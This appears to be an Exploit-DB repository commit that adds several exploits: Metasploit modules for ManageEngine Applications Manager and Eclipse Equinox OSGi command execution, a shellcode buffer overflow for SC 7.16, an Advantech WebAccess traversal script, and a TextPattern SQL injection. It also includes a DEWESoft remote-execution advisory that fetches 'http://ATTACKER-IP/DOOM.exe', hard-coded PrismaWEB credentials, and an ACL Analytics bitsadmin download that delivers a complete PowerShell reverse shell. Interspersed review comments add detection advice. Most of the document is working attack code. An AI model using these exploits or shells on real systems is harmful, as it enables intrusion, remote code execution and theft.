DB: 2018-03-13

8 changes to exploits/shellcodes

Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader
Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader

SC 7.16 - Stack-Based Buffer Overflow

DEWESoft X3 SP1 (64-bit) - Remote Command Execution

Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)

ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)

Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials
TextPattern 4.6.2 - 'qty' SQL Injection
Advantech WebAccess < 8.3 - Directory Traversal / Remote Code Execution
ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution
Offensive Security 2018-03-13 05:01:46 +00:00
parent 5947825a84
commit 3f6d16d5c3
9 changed files with 709 additions and 1 deletions

exploits/java/webapps/44274.rb

@ -0,0 +1,117 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine Applications Manager Remote Code Execution",
'Description' => %q{
This module exploits command injection vulnerability in the ManageEngine Application Manager product.
An unauthenticated user can execute a operating system command under the context of privileged user.
Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
by accessing given system. This endpoint calls a several internal classes and then executes powershell script
without validating user supplied parameter when the given system is OfficeSharePointServer.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['CVE', '2018-7890'],
['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'RPORT' => 9090
},
'Payload' =>
{
'BadChars' => "\x22"
},
'Platform' => ['win'],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' => [ ['Automatic', {}] ],
'Privileged' => true,
'DisclosureDate' => 'Mar 7 2018',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
]
)
end
def check
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(3),
'UserName' => Rex::Text.rand_text_alpha(3)
}
})
if res && res.body.include?('Kindly check the credentials and try again')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
powershell_options = {
encode_final_payload: true,
remove_comspec: true
}
p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
print_status('Triggering the vulnerability')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
'vars_post' => {
'method' => 'testCredentialForConfMonitors',
'type' => 'OfficeSharePointServer',
'montype' => 'OfficeSharePointServer',
'isAgentEnabled' => 'NO',
'isAgentAssociated' => 'false',
'displayname' => Rex::Text.rand_text_alpha(10),
'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
'Version' => '2013',
'Powershell' => 'True', # :-)
'CredSSP' => 'False',
'SPType' => 'SPServer',
'CredentialDetails' => 'nocm',
'Password' => Rex::Text.rand_text_alpha(3),
'UserName' => "$(#{p})"
}
})
end
end
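Review bot: the `check` method (the `if res && res.body.include?('Kindly check the credentials and try again')` branch) treats a generic credential-failure message as proof of vulnerability, so a build that still returns that string after the injection is fixed will be reported `Vulnerable`; pair it with a version check or downgrade the result to `Exploit::CheckCode::Appears` when only the string matches. The description should also name the parameter that reaches PowerShell unescaped (`UserName`, per the `"$(#{p})"` in `exploit`), since that is what an operator reviewing logs will want, and it has grammar slips (`exploits command injection vulnerability`, `execute a operating system command`). For detection, the observable artifact on the server is the Applications Manager Java process spawning `powershell.exe` with an encoded command, which is worth a sentence in the description.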

exploits/linux/local/44279.py

@ -0,0 +1,78 @@
# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
# Bug found using Exploit Pack - Local fuzzer feature.
#
# Tested on: GNU/Linux - Kali Linux
# Filename: pool/main/s/sc/sc_7.16-4+b2_i386.deb
#
# Description: SC v7.16 is prone to a basic stack-based buffer overflow
# vulnerability because the application fails to perform adequate
# boundary-checks on user-supplied input.
#
# An attacker could exploit this issue to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: SC v7.16 -
http://www.ibiblio.org/pub/Linux/apps/financial/spreadsheet/!INDEX.html
#
#
#[----------------------------------registers-----------------------------------]
#EAX: 0x0
#EBX: 0x41414141 ('AAAA')
#ECX: 0x42 ('B')
#EDX: 0x1
#ESI: 0x41414141 ('AAAA')
#EDI: 0x41414141 ('AAAA')
#EBP: 0x41414141 ('AAAA')
#ESP: 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
#EIP: 0x41424344 ('DCBA')
#EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT
direction overflow)
#[-------------------------------------code-------------------------------------]
#Invalid $PC address: 0x41424344
#[------------------------------------stack-------------------------------------]
#0000| 0xbfffee30 --> 0xbffff100 --> 0xb7fd9000 (jg 0xb7fd9047)
#0004| 0xbfffee34 --> 0x1
#0008| 0xbfffee38 --> 0x0
#0012| 0xbfffee3c --> 0x0
#0016| 0xbfffee40 --> 0xf63d4e2e
#0020| 0xbfffee44 --> 0xb7fe4bf9 (<do_lookup_x+1689>: add esp,0x20)
#0024| 0xbfffee48 --> 0x1
#0028| 0xbfffee4c --> 0x1
#[------------------------------------------------------------------------------]
#Legend: code, data, rodata, value
#Stopped reason: SIGSEGV
#0x41424344 in ?? ()
#gdb-peda$ backtrace
##0 0x41424344 in ?? ()
##1 0xbffff100 in ?? ()
#Backtrace stopped: previous frame inner to this frame (corrupt stack?)
#gdb-peda$
#
#==2332==
#==2332== Jump to the invalid address stated on the next line
#==2332== at 0x41424344: ???
#==2332== Address 0x41424344 is not stack'd, malloc'd or (recently) free'd
#==2332==
#==2332==
#==2332== Process terminating with default action of signal 11 (SIGSEGV)
#==2332== Access not within mapped region at address 0x41424344
#==2332== at 0x41424344: ???
import subprocess
import os
buffersize = 1052
nopsled = "\x90"
# Shell
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
eip = "\x10\xf0\xff\xbf"
buffer = nopsled * (buffersize-len(shellcode)) + eip
try:
subprocess.call(["/usr/bin/sc", buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "SC binary not found!"
else:
print "Error executing exploit"
raise
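Review bot: the header claims arbitrary code execution, but the script only demonstrates the crash: `buffer` is built from the NOP sled plus the fixed `eip` bytes and never includes `shellcode`, and the quoted gdb session shows EIP at 0x41424344 from a pattern string rather than a controlled jump, so the entry should be labelled a crash/DoS proof of concept (which is what the `SC 7.16 - Stack-Based Buffer Overflow` title in files.csv implies). The hard-coded `eip` also assumes a non-randomised stack, which belongs under `Tested on`. Style: this is Python 2 only (`print` statements, and `os.errno`, which is not a documented attribute and is removed in Python 3.7+); either mark the interpreter version or use `import errno` and `errno.ENOENT`.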

exploits/multiple/remote/44280.rb

@ -0,0 +1,118 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'base64'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
TELNET_IAC = Msf::Exploit::Remote::Telnet
def initialize(info = {})
super(update_info(info,
'Name' => 'Eclipse Equinoxe OSGi Console Command Execution',
'Description' => %q{
Exploit Eclipse Equinoxe OSGi (Open Service Gateway initiative) console
'fork' command to execute arbitrary commands on the remote system..
},
'Author' =>
[
'Quentin Kaiser <kaiserquentin@gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://www.eclipse.org/equinox/documents/quickstart-framework.php']
],
'Platform' => %w{ linux win },
'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64],
'Targets'=> [
[ 'Linux (Bash Payload)', { 'Platform' => 'linux' } ],
[ 'Windows (Powershell Payload)', { 'Platform' => 'win' } ]
],
'CmdStagerFlavor' => [ 'bourne' ],
'DisclosureDate' => 'Feb 13 2018',
'DefaultTarget' => 0))
deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
register_options([
OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])
])
end
def check
connect
res = sock.get_once
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
# terminal type 'xterm-256color' = \x78\x74\x65\x72\x6D\x2D\x32\x35\x36\x63\x6F\x6C\x6F\x72
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
res = sock.get_once
end
disconnect
if res && res == "osgi> "
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
begin
print_status("Accessing the OSGi console ...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NoTarget, "#{peer} - Failed to access the OSGi console")
end
if target['Platform'] == "win" then
exec_command("fork \"#{cmd_psh_payload(payload.encoded, payload_instance.arch.first, {encode_final_payload: true, remove_comspec: true})}\"")
else
execute_cmdstager({:flavor => :bourne})
end
print_status("#{rhost}:#{rport} - Waiting for session...")
(datastore['TIME_WAIT']).times do
Rex.sleep(1)
# Success! session is here!
break if session_created?
end
rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e
fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")
ensure
disconnect
end
end
def exec_command(cmd)
connect
res = sock.get_once
if res == TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_ECHO+\
TELNET_IAC::IAC+TELNET_IAC::WILL+TELNET_IAC::OPT_SGA+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_NAWS+\
TELNET_IAC::IAC+TELNET_IAC::DO+TELNET_IAC::OPT_TTYPE
sock.put(TELNET_IAC::IAC+TELNET_IAC::SB+TELNET_IAC::OPT_TTYPE+\
"\x00xterm-256color"+TELNET_IAC::IAC+TELNET_IAC::SE)
res = sock.get_once
end
print_status("Exploiting...")
sock.put("#{cmd}\r\n")
res = sock.get
sock.put("disconnect\r\n")
res = sock.get
sock.put("y\r\n")
end
def execute_command(cmd, opts={})
cmd_b64 = Base64.encode64(cmd).gsub(/\s+/, "")
# Runtime.getRuntime().exec() workaround on Linux. Requires bash.
exec_command("fork \"bash -c {echo,#{cmd_b64}}|{base64,-d}|{bash,-i}\"")
end
end
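Review bot: `check` uses exact equality (`res == "osgi> "`) on the second `sock.get_once`, so a console that sends a banner before the prompt, or whose prompt arrives split across reads, is reported `Safe` even though the console is exposed; `res.end_with?("osgi> ")` or a read-until-prompt loop would be more robust, and the telnet negotiation block duplicated in `check` and `exec_command` could be one helper. The `Name` and files.csv entry spell the project `Equinoxe`; the referenced URL and the project itself use Equinox, and the description ends with `..`. From a detection standpoint the module's footprint is a telnet-style session to the console port issuing a `fork` command, which is worth stating in the description for operators reviewing exposed OSGi consoles.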


@ -0,0 +1,36 @@
Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass
Vendor: Prisma Industriale S.r.l.
Product web page: https://www.prismaindustriale.com
Affected version: 1.0 (Rev 21, EPROM 202FWSAM ??)
Summary: Web Administration of Machine.
Desc: The vulnerability exists due to the disclosure of hard-coded credentials allowing
an attacker to effectively bypass authentication of PrismaWEB with administrator
privileges. The credentials can be disclosed by simply navigating to the login_par.js
JavaScript page that holds the username and password for the management interface that
are being used via the Login() function in /scripts/functions_cookie.js script.
Tested on: HMS AnyBus-S WebServer
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5453
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php
06.02.2018
---
$ curl http://10.10.10.70/user/scripts/login_par.js
// JavaScript Document
// 11 Dicembre 2009 Release 1.0 Rev.10
var txtChkUser = "prismaweb"; // Nome utente Login
var txtChkPassword = "prisma"; // Password Login
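Review bot: the version fields disagree: the title says PrismaWEB 1.21 while `Affected version:` reads `1.0 (Rev 21, EPROM 202FWSAM ??)` with an unresolved `??`, and the title calls the issue `Authentication Bypass` while the files.csv entry lists it as `Hard-Coded Credentials`; settle on one wording and resolve the EPROM string before publication. The `Tested on: HMS AnyBus-S WebServer` line and the `curl` output are the actionable details for defenders, so the advisory should say explicitly that `/user/scripts/login_par.js` is served without authentication and that the fix is to perform the credential check server-side rather than in client-side JavaScript.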


@ -0,0 +1,87 @@
=============================================
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised: March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=============================================
I. VULNERABILITY
-------------------------
SQL Injection in Textpattern <= 4.6.2
II. BACKGROUND
-------------------------
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the variable "qty" on the page
"index.php".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
SQL injection.
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
Note: the variable "_txp_token" doest not work as a anti-csrf.
POC:
/textpattern/textpattern/index.php?event=link&step=link_change_pageby&qty=50%20into%20outfile%20'%
5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
Textpattern <= 4.6.2
VII. SOLUTION
-------------------------
Disable website until a fix is available.
VIII. REFERENCES
-------------------------
https://textpattern.com/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Send to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
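Review bot: section III states the bug was found while authenticated as administrator and that HTTP/1.0 is required, but neither precondition is reflected in the severity (`7,1/10`) or the business impact, and the HTTP/1.0 requirement is given without saying why it matters; state the privilege level needed and the reason for the protocol requirement so readers can judge real exposure. The proof of concept in IV uses `INTO OUTFILE`, which additionally requires the MySQL `FILE` privilege and a writable path on the database host, and that should be listed as a prerequisite too. Minor: `doest not work as a anti-csrf` → `does not work as an anti-CSRF token`, the CVSS score uses a comma as decimal separator, and the `Solution` section could mention restricting access to the admin interface as an interim measure alongside disabling the site.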


@ -0,0 +1,100 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security
Vendor:
=============
www.dewesoft.com
Product:
===========
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe
Vulnerability Type:
===================
Remote Internal Command Access
CVE Reference:
==============
CVE-2018-7756
Security Issue:
================
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
RUN <ANY EXE>
RUNEX <ANY EXE>
GETFIREWALL
SETFIREWALL Off
KILL <PROCESS>
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE
Exploit/POC:
=============
TELNET x.x.x.x 1999
RUN calc.exe
OR
Launch the victims browser and send them to website for a drive-by download etc.
TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe
Then from the TELNET session execute it from Downloads directory.
runexe c:\Users\victim\Downloads\DOOM.exe
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replys, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
March 10, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
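Review bot: the `Security Issue` section never says which interfaces `RunExeFile.exe` binds to on TCP 1999 or whether it runs at boot or only during installation (the text calls it both the `installer` component and a `Launcher` that remains after a full install), which is exactly what an operator needs to assess exposure; please state the listener binding and its lifetime. The advisory also has no mitigation section: until the vendor acts, blocking inbound TCP 1999 at the host firewall and alerting on `RunExeFile.exe` spawning child processes or on new connections to port 1999 are the obvious defensive measures and are worth stating. Typo in the timeline: `replys` → `replies`.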


@ -0,0 +1,74 @@
#!/usr/bin/python2.7
# Exploit Title: Advantech WebAccess < 8.3 webvrpcs Directory Traversal RCE Vulnerability
# Date: 03-11-2018
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: www.advantech.com
# Software Link: http://advcloudfiles.advantech.com/web/Download/webaccess/8.2/AdvantechWebAccessUSANode8.2_20170817.exe
# Version: Advantech WebAccess 8.2-2017.08.18
# Tested on: Windows Server 2008 R2 Enterprise 64-bit
# CVE : CVE-2017-16720
# See Also: https://www.zerodayinitiative.com/advisories/ZDI-18-024/
import sys, struct
from impacket import uuid
from impacket.dcerpc.v5 import transport
def call(dce, opcode, stubdata):
dce.call(opcode, stubdata)
res = -1
try:
res = dce.recv()
except Exception, e:
print "Exception encountered..." + str(e)
sys.exit(1)
return res
if len(sys.argv) != 2:
print "Provide only host arg"
sys.exit(1)
port = 4592
interface = "5d2b62aa-ee0a-4a95-91ae-b064fdb471fc"
version = "1.0"
host = sys.argv[1]
string_binding = "ncacn_ip_tcp:%s" % host
trans = transport.DCERPCTransportFactory(string_binding)
trans.set_dport(port)
dce = trans.get_dce_rpc()
dce.connect()
print "Binding..."
iid = uuid.uuidtup_to_bin((interface, version))
dce.bind(iid)
print "...1"
stubdata = struct.pack("<III", 0x00, 0xc351, 0x04)
call(dce, 2, stubdata)
print "...2"
stubdata = struct.pack("<I", 0x02)
res = call(dce, 4, stubdata)
if res == -1:
print "Something went wrong"
sys.exit(1)
res = struct.unpack("III", res)
if (len(res) < 3):
print "Received unexpected length value"
sys.exit(1)
print "...3"
# ioctl 0x2711
stubdata = struct.pack("<IIII", res[2], 0x2711, 0x204, 0x204)
command = "..\\..\\windows\\system32\\calc.exe"
fmt = "<" + str(0x204) + "s"
stubdata += struct.pack(fmt, command)
call(dce, 1, stubdata)
print "\nDid it work?"
dce.disconnect()
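Review bot: the `if (len(res) < 3)` guard after `res = struct.unpack("III", res)` is unreachable: `unpack` raises `struct.error` unless `res` is exactly 12 bytes, so a short or long reply produces a traceback instead of the intended message; check `len(res)` before unpacking, or use `struct.unpack_from`. The same line uses native byte order (`"III"`) while every `pack` call uses explicit little-endian (`"<..."`); use `"<III"` for consistency. The script is Python 2 only (`except Exception, e`, `print` statements), which the `#!/usr/bin/python2.7` shebang covers but deserves a note in the header. For defenders, the header should also state that the traffic is DCERPC on TCP 4592 to interface `5d2b62aa-ee0a-4a95-91ae-b064fdb471fc` carrying a `..\..\` path in the opnum 1 stub, since that is the pattern to alert on.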


@ -0,0 +1,90 @@
# Exploit Title: Arbitrary Code Execution
# Google Dork: N/A
# Date: 03-07-2018
# Exploit Author: Clutchisback1
# Vendor Homepage: https://www.acl.com
# Software Link: https://www.acl.com/products/acl-analytics/
# Version: 11.x - 13.0.0.579
# Tested on: Windows 7 pro SP1 x86
#########################################################################
#
#
# Clutchisback1 /\/\/\ I'll get OSCP one day! /\/\/\
# Welcome to A_C_SHELLLLLL!!
# All Glory to Yeshua
# Shoutouts to my Menotor: Ch33z_plz for teaching me everyday
# and my Offsec Mentor: T0w3ntum introducing me to netsec!
# (I have consent for those mentions :D)
#
#
#########################################################################
EXECUTE 'bitsadmin /transfer myDownloadJob /download /priority high http://127.0.0.1/shell.ps1 c:\temp\shell.ps1'
EXECUTE "powershell C:\temp\shell.ps1"
Description/Usage:
Please use the script below to create a reverse shell payload that will be downloaded form your attacking machine and uploaded to the target host by bitsadmin and placed in the target c:\temp directory and saved as shell.ps1.
The second `Execute` command will execute the stored payload
Powershell Reverse Shell was downloaded from here: https://gist.github.com/staaldraad/204928a6004e89553a8d3db0ce527fd5
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 443);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null;
$res = ""
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 1024)
}
$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
if(!$out.equals("exit")){
$args = "";
if($out.IndexOf(' ') -gt -1){
$args = $out.substring($out.IndexOf(' ')+1);
$out = $out.substring(0,$out.IndexOf(' '));
if($args.split(' ').length -gt 1){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args"
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0) {
$res = $stderr
} else {
$res = $stdout
}
}
else{
$res = (&"$out" "$args") | out-string;
}
}
else{
$res = (&"$out") | out-string;
}
if($res -ne $null){
$writer.WriteLine($res)
}
}
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
END
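Review bot: the file never explains the vulnerable condition: it shows two `EXECUTE` lines that run operating-system commands, but not how an attacker gets such a script executed in the victim's ACL Analytics (a crafted project or script file opened by the user, a shared script, etc.), nor whether `EXECUTE` running shell commands is intended behaviour, so the listing reads as a feature rather than a flaw for versions 11.x through 13.0.0.579; add a description of the attack vector and the trust boundary crossed. The `EXECUTE` lines and the PowerShell block use `127.0.0.1` and port 443 without saying these are placeholders; label them as values to replace. The `Description/Usage` paragraph has `form` → `from`, the banner has `Menotor` → `Mentor`, and assigning to `$args` in the PowerShell (copied from the linked gist) shadows an automatic variable. Defensively, the observable artifacts are `bitsadmin.exe` transfers and `powershell.exe` spawned from the ACL Analytics process, which is what to hunt for.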


@ -9573,7 +9573,7 @@ id,file,description,date,author,type,platform,port
44200,exploits/hardware/local/44200.md,"Sony Playstation 4 (PS4) < 2.50 - WebKit Code Execution (PoC)",2016-04-21,"TJ Corley",local,hardware,
44204,exploits/linux/local/44204.md,"WebKitGTK 2.1.2 (Ubuntu 14.04) - Heap based Buffer Overflow",2017-08-19,"Ren Kimura",local,linux,
44205,exploits/linux/local/44205.md,"Linux Kernel - 'BadIRET' Local Privilege Escalation",2017-07-24,"Ren Kimura",local,linux,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44206,exploits/hardware/local/44206.c,"Sony Playstation 4 (PS4) 1.76 - 'dlclose' Linux Kernel Loader",2016-04-27,"Carlos Pizarro",local,hardware,
44224,exploits/windows/local/44224.py,"iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow",2018-03-02,ScrR1pTK1dd13,local,windows,
38457,exploits/windows/local/38457.c,"ASX to MP3 Converter 1.82.50 (Windows 2003 x86) - '.asx' Local Stack Overflow",2015-10-17,"Ivan Ivanovic",local,windows,
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
@ -9587,6 +9587,7 @@ id,file,description,date,author,type,platform,port
44267,exploits/windows/local/44267.md,"Tor (Firefox 41 < 50) - Code Execution",2016-12-01,649,local,windows,
44269,exploits/windows/local/44269.txt,"Chrome 35.0.1916.153 - Sandbox Escape / Command Execution",2017-10-14,649,local,windows,
44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16064,6 +16065,7 @@ id,file,description,date,author,type,platform,port
43411,exploits/windows/remote/43411.rb,"HP Mercury LoadRunner Agent magentproc.exe - Remote Command Execution (Metasploit)",2018-01-01,Metasploit,remote,windows,54345
43412,exploits/unix/remote/43412.rb,"Cambium ePMP1000 - 'ping' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,unix,
43413,exploits/cgi/remote/43413.rb,"Cambium ePMP1000 - 'get_chart' Shell via Command Injection (Metasploit)",2018-01-01,Metasploit,remote,cgi,
44275,exploits/windows/remote/44275.txt,"DEWESoft X3 SP1 (64-bit) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows,
43428,exploits/hardware/remote/43428.py,"Iopsys Router - 'dhcp' Remote Code Execution",2017-12-23,neonsea,remote,hardware,
43429,exploits/hardware/remote/43429.rb,"Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)",2018-01-04,Metasploit,remote,hardware,
43430,exploits/linux/remote/43430.rb,"Xplico - Remote Code Execution (Metasploit)",2018-01-04,"Mehmet Ince",remote,linux,9876
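Review bot: the new `44275` row leaves the `port` column empty even though the advisory identifies the listener as TCP 1999; fill it in (`...,remote,windows,1999`) as the neighbouring `43411` row does for its service port, so the CSV is searchable by port.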
@ -16318,6 +16320,7 @@ id,file,description,date,author,type,platform,port
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
44280,exploits/multiple/remote/44280.rb,"Eclipse Equinoxe OSGi Console - Command Execution (Metasploit)",2018-03-12,Metasploit,remote,multiple,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
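Review bot: the `44280` row spells the project `Equinoxe`; the referenced Eclipse URL in the module and the project itself use `Equinox`, so the description should read `Eclipse Equinox OSGi Console - Command Execution (Metasploit)` and the module `Name` should match.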
